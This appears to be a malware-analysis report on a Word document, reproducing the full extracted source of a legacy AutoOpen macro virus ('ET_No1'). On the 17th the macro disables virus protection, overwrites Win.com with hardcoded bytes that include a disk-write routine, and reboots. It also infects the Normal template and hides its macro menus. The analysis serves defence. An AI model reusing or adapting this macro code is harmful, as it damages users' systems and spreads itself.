MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains a legacy WordBasic AutoOpen macro, identified by the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic. This macro attempts to write a file named 'Win.com' to the Windows directory using hardcoded hexadecimal byte sequences. It then attempts to reboot the system using ExitWindowsEx. The macro also attempts to remove itself from the Normal template, indicating an effort to evade detection and maintain persistence.
Heuristics 3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9765 bytes |
SHA-256: 16780812123d4b0e81f39aa0d83d7eea11fcb10e568d1e435d4cdddd5b9af9d9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ET_No1"
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Attribute GetWindowsDirectory.VB_ProcData.VB_Invoke_Func = "ProVirus.Virus.AutoOpen"
Private Declare Function ExitWindowsEx Lib "User32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Sub AutoOpen()
'
Dim DD As Byte
On Error Resume Next
Options.VirusProtection = False
If Day(Date) = 17 Then
Txt1 = "E9FD09"
Txt2 = "B80103BB0080B90100BA8000CD13E9FC04"
windir$ = String(144, " ")
l = GetWindowsDirectory(windir$, 144)
windir = Left(windir$, l)
Open windir + "\Win.com" For Binary Access Write Lock Read As #1
For i = 1 To 3
DD = "&H" + Mid(Txt1, 2 * i - 1, 2)
Put #1, , DD
Next i
For i = 1 To 17
DD = "&H" + Mid(Txt2, 2 * i - 1, 2)
Put #1, 2560 + i, DD
Next i
Close #1
Call ExitWindowsEx(6, 0)
End If
DocName = ActiveDocument.Path + "\" + ActiveDocument.Name
DotName = NormalTemplate.Path + "\" + NormalTemplate.Name
If CommandBars("Visual Basic").Controls(1).Caption <> "ETKill" Then
Application.OrganizerDelete Source:=DotName, Name:="ET_No1", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=DocName, Destination:=DotName, Name:="ET_No1", Object:=wdOrganizerObjectProjectItems
DelTools
CustomizationContext = NormalTemplate
FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
CustomizationContext = NormalTemplate
FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
For k = 1 To CommandBars("Visual Basic").Controls.Count
CommandBars("Visual Basic").Controls(1).Delete
Next k
Set MyFlag = CommandBars("Visual Basic").Controls.Add(Type:=msoControlButton, ID:=752)
MyFlag.FaceId = 30
CommandBars("Visual Basic").Controls(1).Caption = "ETKill"
NormalTemplate.Save
Else
Application.OrganizerCopy Source:=DotName, Destination:=DocName, Name:="ET_No1", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
End If
End Sub
Sub DelTools()
For i = 1 To CommandBars("Tools").Controls.Count
If CommandBars("Tools").Controls(i).Caption = "ºê(&M)" Then
CommandBars("Tools").Controls(i).Delete
Exit For
End If
Next i
For i = 1 To CommandBars("Tools").Controls.Count
If CommandBars("Tools").Controls(i).Caption = "×Ô¶¨Òå(&C)..." Then
CommandBars("Tools").Controls(i).Delete
Exit For
End If
Next i
Application.OnTime When:=Now + TimeValue("00:0:01"), Name:="DelTools"
End Sub
' Processing file: /opt/analyzer/scan_staging/4fce7231d25c498ea3ffccacda3e2214.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/ET_No1 - 4814 bytes
' Line #0:
' FuncDefn (Private Declare Function GetWindowsDirectory Lib "kernel32" (ByVal lpBuffer As String, ByVal nSize As Long) As Long)
' Line #1:
' FuncDefn (Private Declare Function ExitWindowsEx Lib "User32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long)
' Line #2:
' FuncDefn (Sub AutoOpen())
' Line #3:
' QuoteRem 0x0000 0x0000 ""
' Line #4:
' Dim
' VarDefn DD (As Byte)
' Line #5:
' Line #6:
' OnError (Resume Next)
' Line #7:
' Line #8:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #9:
' Line #10:
' Ld Date
' ArgsLd Day 0x0001
' LitDI2 0x0011
' Eq
' IfBlock
' Line #11:
' LitStr 0x0006 "E9FD09"
' St Txt1
' Line #12:
' LitStr 0x002
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.